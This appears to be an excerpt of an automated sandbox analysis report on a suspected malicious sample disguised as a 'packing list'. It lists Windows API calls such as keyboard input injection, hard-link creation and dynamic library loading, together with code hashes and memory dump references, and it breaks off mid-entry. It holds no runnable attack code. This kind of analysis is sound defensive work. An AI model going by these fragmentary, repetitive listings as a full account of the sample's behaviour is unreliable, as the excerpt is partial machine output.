                                                  • Instruction ID: 9e61d3c5fc524f6b9982eece7e7bc1417849708430ea3c4bc32cc7c7e2524b35
                                                  • Opcode Fuzzy Hash: 97a144c65bc120f6f07bb03ec856e1eaea1d7c3096006707b667dbd77bdfa4a6
                                                  • Instruction Fuzzy Hash: 95D09E745147129BD7206F65A848B4677E8AB14711B1086AAE855A21A0EBB4D4808B60
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00B8ECBE,?,00B8EBBB), ref: 00B8ECD6
                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B8ECE8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                  • API String ID: 2574300362-1816364905
                                                  • Opcode ID: 63e3b15a075dfc67d68add9478d00062cd34cf25801bf2cdfdf8f296c16f1085
                                                  • Instruction ID: 0e7be2677c46efbe7d5eadd08dc2b9ed63060a73466503d6e5421e0a4a02bdff
                                                  • Opcode Fuzzy Hash: 63e3b15a075dfc67d68add9478d00062cd34cf25801bf2cdfdf8f296c16f1085
                                                  • Instruction Fuzzy Hash: C6D0C7759007239FDB206F65EC4874276E8EB04751B1085A9F855E32B1EFF4D880DB50
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00B8BAD3,00000001,00B8B6EE,?,00BCDC00), ref: 00B8BAEB
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B8BAFD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                  • API String ID: 2574300362-199464113
                                                  • Opcode ID: 04eed7f0d30ecddc76ec3d24db449335f642cc2a066c969b67002afd6f0ad465
                                                  • Instruction ID: 1e8010ee83ade8f00788a0ff619350712c08937b300eeea59445fb09ea6efc1e
                                                  • Opcode Fuzzy Hash: 04eed7f0d30ecddc76ec3d24db449335f642cc2a066c969b67002afd6f0ad465
                                                  • Instruction Fuzzy Hash: A6D09E759007129FDB30AF75A888B5176D8EB04751B1045A9E857A3164EBB4D881C750
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00B93BD1,?,00B93E06), ref: 00B93BE9
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B93BFB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2574300362-4033151799
                                                  • Opcode ID: 3b7da4aae909257aef6fdfd53e8a284048c0bdb59f21583485e93ca4d9bb3548
                                                  • Instruction ID: 08ab7d60cf4ec83109ec55910934b6f42e51dd3cf6f6285eac772ed9e6075efc
                                                  • Opcode Fuzzy Hash: 3b7da4aae909257aef6fdfd53e8a284048c0bdb59f21583485e93ca4d9bb3548
                                                  • Instruction Fuzzy Hash: 0DD09E74500B52AFDB205B65A808653BAF8EB06715B1045A9E455A2160EBB4D4848A50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a2b436538a2e4f6cdc356e7d0ae72b167fbe2c7cc34b3558faf51096e7e1d859
                                                  • Instruction ID: 16823ae8a208d1b07bd43a9300b362209890c3f5869aa2d938dd45a79758ec4e
                                                  • Opcode Fuzzy Hash: a2b436538a2e4f6cdc356e7d0ae72b167fbe2c7cc34b3558faf51096e7e1d859
                                                  • Instruction Fuzzy Hash: 13C13975A0021AEFDF14DFA4C884AAEB7F9FF48710F108598E905AB291D735EE41DB90
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00B8AAB4
                                                  • CoUninitialize.OLE32 ref: 00B8AABF
                                                    • Part of subcall function 00B70213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B7027B
                                                  • VariantInit.OLEAUT32(?), ref: 00B8AACA
                                                  • VariantClear.OLEAUT32(?), ref: 00B8AD9D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                  • String ID:
                                                  • API String ID: 780911581-0
                                                  • Opcode ID: 9d9867dff79fb0d10f298cb296ed504ebe4fbcb832de6b3042554af4c729b206
                                                  • Instruction ID: ed1c8f65cca813be7822f6bb96c9c09697246127d94d0493d1c8b4eb2d5936b8
                                                  • Opcode Fuzzy Hash: 9d9867dff79fb0d10f298cb296ed504ebe4fbcb832de6b3042554af4c729b206
                                                  • Instruction Fuzzy Hash: CAA13975604701AFDB10EF14C891B1AB7E5FF88710F14849AF99A9B3A2CB70ED44CB86
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyInitString
                                                  • String ID:
                                                  • API String ID: 2808897238-0
                                                  • Opcode ID: b7320a00676e121fbed0e5f14b7cda58657b4ea9ca29f0698bdf03964caf0157
                                                  • Instruction ID: 7c16f20b8d2cd83e91a3a22b168103c9df71990a6f7818a5dde26c7c16bb482d
                                                  • Opcode Fuzzy Hash: b7320a00676e121fbed0e5f14b7cda58657b4ea9ca29f0698bdf03964caf0157
                                                  • Instruction Fuzzy Hash: E6519430604306ABDB249F69D4D5A2EB3EDEF44310F20889FE55ADB3D1DF7898808719
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                  • String ID:
                                                  • API String ID: 3877424927-0
                                                  • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                  • Instruction ID: 29ef1daf0eef8b4c43aabc49a5eef458242a38b023745457f95856def8f1009d
                                                  • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                  • Instruction Fuzzy Hash: 9751D9B1E04205ABDB248F698884B5E77E1EF44BA2F2486EDFC35863D0D7709F589B40
                                                  APIs
                                                  • GetWindowRect.USER32(010F7E10,?), ref: 00B9C544
                                                  • ScreenToClient.USER32(?,00000002), ref: 00B9C574
                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00B9C5DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientMoveRectScreen
                                                  • String ID:
                                                  • API String ID: 3880355969-0
                                                  • Opcode ID: 4aed071e95e3795362d616a9b1e766f61c6bf5f684169a5ca8dc7e45f25d3d4c
                                                  • Instruction ID: db92cd58898977255bd3a49ea5618ad89431d373979a72f8ca7914e55cb44366
                                                  • Opcode Fuzzy Hash: 4aed071e95e3795362d616a9b1e766f61c6bf5f684169a5ca8dc7e45f25d3d4c
                                                  • Instruction Fuzzy Hash: 63511D75A00205EFCF10DF68C881AAE7BF5EB55320F2186A9F9559B291D770ED41CB90
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00B6C462
                                                  • __itow.LIBCMT ref: 00B6C49C
                                                    • Part of subcall function 00B6C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00B6C753
                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00B6C505
                                                  • __itow.LIBCMT ref: 00B6C55A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow
                                                  • String ID:
                                                  • API String ID: 3379773720-0
                                                  • Opcode ID: e62fee18dc5a85abd3d611eeff282ba50d32caa1bc13f7c9f7523a7024ae51cb
                                                  • Instruction ID: b5243ad4e027ad754edbf9470ba68ff17f91e346ee5ed90411feb24ffb80aca2
                                                  • Opcode Fuzzy Hash: e62fee18dc5a85abd3d611eeff282ba50d32caa1bc13f7c9f7523a7024ae51cb
                                                  • Instruction Fuzzy Hash: 0441B871600608ABDF21EF54CC52BFE7FF9AF59700F0000A5F946B7291DB749A458B61
                                                  APIs
                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B73966
                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00B73982
                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00B739EF
                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00B73A4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: d3b5941d8d40d32a1f5ea02adb2fea22df73de7308fbea8e04fead23e4cc4ac2
                                                  • Instruction ID: 94278b538f86907b777304195ed12b405beb89e209e74733fe3de488cd2d388e
                                                  • Opcode Fuzzy Hash: d3b5941d8d40d32a1f5ea02adb2fea22df73de7308fbea8e04fead23e4cc4ac2
                                                  • Instruction Fuzzy Hash: F6412970E04208AEEF308B648846BFDBBF5DB55710F04819AF5EA522C1CBB58E85F761
                                                  APIs
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B7E742
                                                  • GetLastError.KERNEL32(?,00000000), ref: 00B7E768
                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B7E78D
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B7E7B9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3321077145-0
                                                  • Opcode ID: 324e485c1c8ee14a2fb376c130c0e9c2d1d2a842a63b6d28b2f2cf467a8535a6
                                                  • Instruction ID: 58a8e6e0cca5b8a3f80ccc4eb4456adfe36323c0cba0910f0a1e8524f4914aa2
                                                  • Opcode Fuzzy Hash: 324e485c1c8ee14a2fb376c130c0e9c2d1d2a842a63b6d28b2f2cf467a8535a6
                                                  • Instruction Fuzzy Hash: 4B412239600610AFCB15EF14C485A4DBBE5FF99720F1980D8E91AAB3A2CB74FD009B95
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B9B5D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: 186b2feebc9fe7509e24176480ab3fc0e9acadc4eb393edd9230bb2d93685937
                                                  • Instruction ID: abf61e27d59b51d065b1295a06edb81dfc3cb8ae1411fb23786d0054f13ed0fc
                                                  • Opcode Fuzzy Hash: 186b2feebc9fe7509e24176480ab3fc0e9acadc4eb393edd9230bb2d93685937
                                                  • Instruction Fuzzy Hash: B331DE34601208FBEF208F18EE99FA8B7E5EB16310F6085A5FA11D72E1DB70B940CB51
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 00B9D807
                                                  • GetWindowRect.USER32(?,?), ref: 00B9D87D
                                                  • PtInRect.USER32(?,?,00B9ED5A), ref: 00B9D88D
                                                  • MessageBeep.USER32(00000000), ref: 00B9D8FE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  • Opcode ID: e744101237795c05ba2929935e63937c37b5a6c03cd779179a270f799df9162a
                                                  • Instruction ID: 3cb8a0d04f6f3db2b21071402c8d42fff9ef36672e989de332a74c6c2a10f8c5
                                                  • Opcode Fuzzy Hash: e744101237795c05ba2929935e63937c37b5a6c03cd779179a270f799df9162a
                                                  • Instruction Fuzzy Hash: 05415674A00219EFCF11DF5AD8C4AA9BBF5FB49310F1889F9E8149B2A2D730A941CB50
                                                  APIs
                                                  • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00B73AB8
                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B73AD4
                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00B73B34
                                                  • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00B73B92
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: 4e4df134d3e8f66456191c569e676eff06ac32f368f53662531e6b4261db55ec
                                                  • Instruction ID: 70414346eb84e0bdb62552774a5088a2efa76ac793585d063e686e5291786fd4
                                                  • Opcode Fuzzy Hash: 4e4df134d3e8f66456191c569e676eff06ac32f368f53662531e6b4261db55ec
                                                  • Instruction Fuzzy Hash: 8A316430A00248AEEF308B648859BFE7BE9DB55B10F0482DAE4E9933D1C7748F45E761
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B64038
                                                  • __isleadbyte_l.LIBCMT ref: 00B64066
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00B64094
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00B640CA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: 31b75546fa3dcae2e05cdbe5d34a2e3b04f4f96d280cf74b716673220bfbef4e
                                                  • Instruction ID: d9317996b3ea7dbdcd2d7297fdb66ea8d17712411dfcec374e11b8e2cbbbcaad
                                                  • Opcode Fuzzy Hash: 31b75546fa3dcae2e05cdbe5d34a2e3b04f4f96d280cf74b716673220bfbef4e
                                                  • Instruction Fuzzy Hash: D031E130600A26EFDB229F34C844BBB7BE5FF40310F1544A8EA618B0A1E735D890DB90
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00B97CB9
                                                    • Part of subcall function 00B75F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B75F6F
                                                    • Part of subcall function 00B75F55: GetCurrentThreadId.KERNEL32 ref: 00B75F76
                                                    • Part of subcall function 00B75F55: AttachThreadInput.USER32(00000000,?,00B7781F), ref: 00B75F7D
                                                  • GetCaretPos.USER32(?), ref: 00B97CCA
                                                  • ClientToScreen.USER32(00000000,?), ref: 00B97D03
                                                  • GetForegroundWindow.USER32 ref: 00B97D09
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  • Opcode ID: 611e9bf45230fec661b202a87e1a156e3386ee6ef799d7cf3335baeef159225a
                                                  • Instruction ID: 3fdff71ed06fc35e6fe33ac84f2c8e7ee88326325cc6aabe907bb90542a92719
                                                  • Opcode Fuzzy Hash: 611e9bf45230fec661b202a87e1a156e3386ee6ef799d7cf3335baeef159225a
                                                  • Instruction Fuzzy Hash: 79312F71D00108AFDB10EFA9D8859EFBBF9EF58310B1084AAF815E7211DA759F05DBA0
                                                  APIs
                                                    • Part of subcall function 00B4B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B4B35F
                                                  • GetCursorPos.USER32(?), ref: 00B9F211
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BAE4C0,?,?,?,?,?), ref: 00B9F226
                                                  • GetCursorPos.USER32(?), ref: 00B9F270
                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BAE4C0,?,?,?), ref: 00B9F2A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                  • String ID:
                                                  • API String ID: 2864067406-0
                                                  • Opcode ID: dc221ff7dca4c64bba268ebc43daefde7eaf11880e5d58c3a4cfceb4960ae49f
                                                  • Instruction ID: da360d79b21fec7293874d27f4bf08b00c7b7d38ec1482dc1fd04719c718fdf7
